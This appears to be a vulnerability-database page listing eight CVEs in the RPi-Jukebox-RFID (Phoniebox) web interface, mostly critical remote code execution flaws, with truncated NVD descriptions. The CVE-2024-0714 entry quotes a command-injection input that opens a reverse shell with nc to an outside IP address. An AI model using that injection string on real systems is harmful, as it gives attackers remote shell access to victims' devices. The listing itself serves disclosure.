Sourcefabric Phoniebox vulnerabilities
8 known vulnerabilities affecting sourcefabric/phoniebox.
Total CVEs
8
CISA KEV
0
Public exploits
0
Exploited in wild
0
Severity breakdown
CRITICAL7HIGH1
Vulnerabilities
Page 1 of 1
CVE-2024-0714P2CRITICALCVSS 9.8≤ 2.5.02024-01-19
CVE-2024-0714 [CRITICAL] CWE-78 CVE-2024-0714: A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. A
A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack
nvd
CVE-2024-41367P3CRITICALCVSS 9.8v2.7.02024-08-29
CVE-2024-41367 [CRITICAL] CWE-94 CVE-2024-41367: RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via ht
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\api\playlist\appendFileToPlaylist.php
nvd
CVE-2024-41361P3CRITICALCVSS 9.8v2.7.02024-08-29
CVE-2024-41361 [CRITICAL] CWE-94 CVE-2024-41361: RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via ht
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\manageFilesFolders.php
nvd
CVE-2024-41368P3CRITICALCVSS 9.8v2.7.02024-08-29
CVE-2024-41368 [CRITICAL] CWE-94 CVE-2024-41368: RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via ht
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\inc.setWlanIpMail.php
nvd
CVE-2024-41366P3CRITICALCVSS 9.8v2.7.02024-08-29
CVE-2024-41366 [CRITICAL] CWE-94 CVE-2024-41366: RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via ht
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\userScripts.php
nvd
CVE-2024-41364P3CRITICALCVSS 9.8v2.7.02024-08-29
CVE-2024-41364 [CRITICAL] CWE-94 CVE-2024-41364: RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via ht
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\trackEdit.php
nvd
CVE-2024-41369P3CRITICALCVSS 9.8v2.7.02024-08-29
CVE-2024-41369 [CRITICAL] CWE-94 CVE-2024-41369: RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via ht
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\inc.setWifi.php
nvd
CVE-2025-63951P3HIGHCVSS 7.5≤ 2025-10-072025-12-18
CVE-2025-63951 [HIGH] CWE-502 CVE-2025-63951: An insecure deserialization vulnerability exists in the rss-mp3.php script of the MiczFlor RPi-Jukeb
An insecure deserialization vulnerability exists in the rss-mp3.php script of the MiczFlor RPi-Jukebox-RFID project through commit 4b2334f0ae0e87c0568876fc41c48c38aa9a7014 (2025-10-07). The 'rss' GET parameter receives data that is passed directly to the unserialize() function without validation. This allows a remote, unauthenticated attacker to injec
nvd